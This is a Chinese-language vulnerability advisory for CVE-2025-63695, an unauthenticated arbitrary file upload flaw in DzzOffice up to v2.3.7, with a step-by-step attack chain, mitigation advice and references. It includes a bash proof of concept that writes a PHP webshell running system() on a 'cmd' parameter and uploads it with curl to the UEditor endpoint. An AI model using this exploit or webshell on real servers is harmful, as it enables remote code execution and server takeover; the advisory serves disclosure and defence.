CVE-2025-63695 DzzOffice 任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-63695

漏洞类型

任意文件上传

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

DzzOffice

漏洞概述

DzzOffice v2.3.7及之前版本存在严重的任意文件上传漏洞。该漏洞位于/dzz/system/ueditor/php/controller.php文件中，由于系统未对上传文件进行充分的类型验证和内容检查，攻击者可以在无需任何认证的情况下，通过构造恶意请求上传任意文件到服务器。成功利用此漏洞可导致远程代码执行，使攻击者完全控制受影响的服务器，窃取敏感数据、植入后门或对系统造成进一步破坏。此漏洞CVSS评分高达9.8，属于严重安全威胁，对互联网暴露的DzzOffice实例构成重大风险。

技术细节

漏洞根源在于DzzOffice集成的UEditor编辑器组件中的controller.php文件存在安全缺陷。该文件在处理文件上传请求时，未对上传文件的扩展名、MIME类型和实际内容进行严格的验证和过滤。攻击者可以绕过客户端和服务器端的检查机制，上传包含恶意代码的文件（如PHP webshell）。具体来说，攻击者通过构造特殊的POST请求，将恶意文件伪装成合法文件类型上传到服务器。由于缺乏对文件内容的深度检查，服务器会接受并保存该恶意文件。一旦攻击者通过Web访问路径访问已上传的恶意文件，即可在服务器上执行任意PHP代码，实现远程命令执行。攻击者通常会上传webshell文件，然后利用webshell执行系统命令、读取敏感配置文件或进一步渗透内网。

攻击链分析

STEP 1

步骤1

识别目标：扫描互联网或内网中运行DzzOffice v2.3.7或更早版本的Web服务器

STEP 2

步骤2

确认漏洞：访问/dzz/system/ueditor/php/controller.php端点，验证其存在且可访问

STEP 3

步骤3

构造恶意文件：创建包含PHP代码的webshell文件（如<?php system($_GET['cmd']); ?>）

STEP 4

步骤4

绕过验证：构造特殊的HTTP POST请求，通过修改Content-Type、MIME类型或文件扩展名绕过基本检查

STEP 5

步骤5

上传文件：向controller.php发送恶意文件上传请求，服务器因缺乏充分验证而接受文件

STEP 6

步骤6

定位文件：根据服务器响应或默认上传路径找到webshell的完整URL

STEP 7

步骤7

执行命令：通过HTTP请求访问webshell，传递系统命令参数，实现远程代码执行

STEP 8

步骤8

持久化控制：利用获得的服务器权限植入后门、窃取数据或进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-63695 DzzOffice Arbitrary File Upload PoC
# Target: DzzOffice <= v2.3.7

TARGET_URL="http://target.com"
UPLOAD_PATH="/dzz/system/ueditor/php/controller.php"
UPLOADED_SHELL="shell.php"

# Create malicious PHP file (webshell)
cat > /tmp/$UPLOADED_SHELL << 'EOF'
<?php
if(isset($_GET['cmd'])) {
    echo "<pre>";
    $cmd = $_GET['cmd'];
    system($cmd);
    echo "</pre>";
}
?>
EOF

# Upload the malicious file
echo "[*] Uploading malicious file..."
curl -X POST "$TARGET_URL$UPLOAD_PATH" \
  -F "upfile=@/tmp/$UPLOADED_SHELL" \
  -F "action=uploadimage" \
  -F "fileName=$UPLOADED_SHELL"

echo ""
echo "[*] If successful, access the shell at:"
echo "[*] $TARGET_URL/dzz/org/dzzoffice/userdir/1/1/$UPLOADED_SHELL?cmd=whoami"

# Cleanup
rm -f /tmp/$UPLOADED_SHELL

影响范围

DzzOffice <= v2.3.7

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 在Web服务器配置中禁止/dzz/system/ueditor/php/路径的访问；2) 通过防火墙或WAF规则限制对相关上传端点的外部访问；3) 设置上传目录为只读且无执行权限；4) 监控日志中的异常文件上传行为；5) 考虑暂时禁用UEditor功能，待官方修复后重新启用。建议尽快安排计划进行版本升级以根本解决问题。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-63695
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-63695
3 Details https://www.cvedetails.com/cve/CVE-2025-63695/
4 VulDB https://vuldb.com/cve/CVE-2025-63695
5 Link https://github.com/Yohane-Mashiro/dzzoffice_upload
6 Link https://github.com/zyx0814/dzzoffice/issues/365
7 Link https://github.com/Yohane-Mashiro/dzzoffice_upload